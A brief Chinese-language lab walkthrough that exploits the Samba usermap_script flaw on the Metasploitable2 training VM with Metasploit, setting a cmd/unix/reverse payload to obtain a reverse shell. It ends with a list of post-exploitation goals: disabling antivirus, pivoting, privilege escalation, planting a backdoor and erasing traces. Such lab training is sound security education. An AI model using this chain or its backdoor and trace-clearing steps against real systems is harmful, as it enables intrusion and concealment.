Metasploitable2是一款很好的渗透测试靶机

实验环境

攻击机:kali IP:192.168.211.140

目标主机:Metasploitable2 IP:192.168.211.132

信息收集

1.使用命令msfconsole进入msf控制台

image-20210317192744736

2.使用Nmap扫描,查看目标系统开放端口和服务.

image-20210317193125963

3.根据扫描结果选择合适的exploit和payload

此次使用Samba3.0存在的漏洞进行攻击

**提示:**在rank栏选择great/excellent的模块,会有很好效果,成功率更高.

image-20210317193350796

4.使用攻击模块

选择exploit/multi/samba/usermap_script

提示:使用info+模块 查看说明

image-20210317194342573

show payloads,查看可用攻击载荷.

5.设置攻击载荷

set PAYLOAD cmd/unix/reverse

设置目标机IP及端口

设置攻击机IP

注意:此处的端口号是漏洞服务对应的端口号,在Nmap那一步可以看到.

show options可以查看payload的配置,Required为不可缺参数

image-20210317195047700

6.使用expolit命令进行攻击

image-20210317195453218

已成功获取目标主机shell !

可以使用命令 uname -a 进行验证.

后续

  • 进一步获取目标系统信息
  • 关闭目标系统杀毒软件
  • 利用已攻陷的主机做为跳板/肉鸡
  • 后渗透(权限提升、横向提权、纵向提权)
  • 留下后门
  • 痕迹清除